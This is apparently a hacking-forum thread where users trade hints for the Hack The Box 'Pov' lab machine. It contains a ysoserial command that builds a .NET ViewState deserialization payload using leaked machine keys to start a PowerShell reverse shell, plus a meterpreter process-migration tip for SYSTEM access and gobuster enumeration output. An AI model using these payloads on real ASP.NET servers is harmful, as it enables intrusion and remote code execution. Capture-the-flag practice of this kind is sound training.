Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
Jan 28, 2024, 04:54 PM
Thanks for sharing hints !!!
Jan 28, 2024, 05:13 PM
I did everything but it didn't work. How can I connect? I encoded and decoded in every possible way.
Jan 28, 2024, 05:27 PM
(This post was last modified: Jan 28, 2024, 05:28 PM by CubeMadness3.)
Does anyone know an alternative to ysoserial.exe? For some reason my rusty 4ss machine doesn't work with it. What I mean by rusty 4ss is an "Ivy Bridge" CPU; it did not work with ysoserial.exe, so I'm looking for an alternative to do the same thing. Anyone?
Jan 28, 2024, 05:35 PM
Jan 28, 2024, 06:14 PM
HOW TO GET ROOT FLAG?
Jan 28, 2024, 07:31 PM
(Jan 28, 2024, 05:27 PM)CubeMadness3 Wrote: Does anyone know an alternative to ysoserial.exe? For some reason my rusty 4ss machine doesn't work with it. What I mean by rusty 4ss is an "Ivy Bridge" CPU; it did not work with ysoserial.exe, so I'm looking for an alternative to do the same thing. Anyone?

Use WINE on Linux. I had a bitch of a time for 5 hours trying to use it on Windows. It flags as a virus first of all, then if you don't have OpenJDK / Java with fastJSON packages installed for dependencies, you're wasting your time. I don't know if the ysoserial Linux version works from GitHub here, because it does not list the VIEWSTATE param as a payload. ysoserial.exe does, so just run it on WINE. You don't even have to open the GUI; you can run the simple command from the CLI in Linux, and it's pre-installed on Kali...

$ wine ysoserial.exe -p Viewstate -g TextFormattingRunProperties.. etc

PoC: Test Case: #4 (because it's .NET >=4.5 on the machine server)
Jan 28, 2024, 08:21 PM
For administrator > take meterpreter session > try migrate any system process > will get NT Authority / System
Jan 28, 2024, 09:16 PM
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e 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" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
Is this the right way to do this? I'm doing it on Windows, yet the payload won't give a reverse shell.
Jan 28, 2024, 09:43 PM
(Jan 28, 2024, 05:35 PM)youssefm55 Wrote:
(Jan 27, 2024, 07:04 PM)DataNinja Wrote: dev.pov.htb
hi sorry can I know how did you fuzz for that subdomain if I need it to be registered first in /etc/hosts file and I can find a DNS server to use as a resolver

└─$ gobuster dns -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-5000.txt -d pov.htb
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: pov.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: dev.pov.htb
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
Jan 29, 2024, 05:39 PM
(Jan 28, 2024, 09:43 PM)ggteaserjff Wrote:
(Jan 28, 2024, 05:35 PM)youssefm55 Wrote:
(Jan 27, 2024, 07:04 PM)DataNinja Wrote: dev.pov.htb
hi sorry can I know how did you fuzz for that subdomain if I need it to be registered first in /etc/hosts file and I can find a DNS server to use as a resolver

I don't know how that worked for you. Here's mine when I tried:

gobuster dns -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -d pov.htb
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: pov.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/29 19:36:45 Starting gobuster in DNS enumeration mode
===============================================================
Progress: 4989 / 4990 (99.98%)
===============================================================
2024/01/29 19:37:54 Finished
===============================================================

I didn't eventually find it by using vhost mode and setting append domain to true